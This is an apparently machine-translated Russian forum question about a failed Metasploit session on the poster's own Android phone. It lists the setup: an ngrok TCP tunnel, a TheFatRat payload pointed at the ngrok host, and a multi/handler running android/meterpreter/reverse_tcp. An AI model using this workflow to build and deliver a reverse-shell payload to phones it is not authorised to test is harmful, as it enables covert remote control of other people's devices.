Я пытаюсь взломать свой телефон Android для целей тестирования.Все идет хорошо, пока я не установлю приложение на свой телефон и не запустите сеанс.Сеанс открывается, но команда meterpreter не отображается.(Я имею в виду, что meterpreter>
не отображается)
На экране нет msf(multi/handler)>
.Это просто пусто после открытия сеанса.
Вот как я создал свою полезную нагрузку:
Сначала я хотел создать туннель, чтобы мой телефон мог подключаться к тому месту, откуда поступал полезный груз,Я использовал ./ngrok tcp 80
для создания этого туннеля.
Как только я запустил туннель и запустил его, я затем использовал fatrat для создания полезной нагрузки.
Для LHOST я поставил 0.tcp.ngrok.io, а для LPORT я поставил число после 0.tcp.ngrok.io в окне ngrok.
Затем я набрал msfconsole.Затем я набрал use exploit/multi/handler
, а затем набрал set payload android/meterpreter/reverse_tcp
.После этого я установил LHOST на 0.0.0.0 и LPORT на 80. Затем я набрал run
.
Я не знаю, что происходит.Если кто-нибудь сможет пролить свет на то, что я делаю неправильно, это будет очень ценно.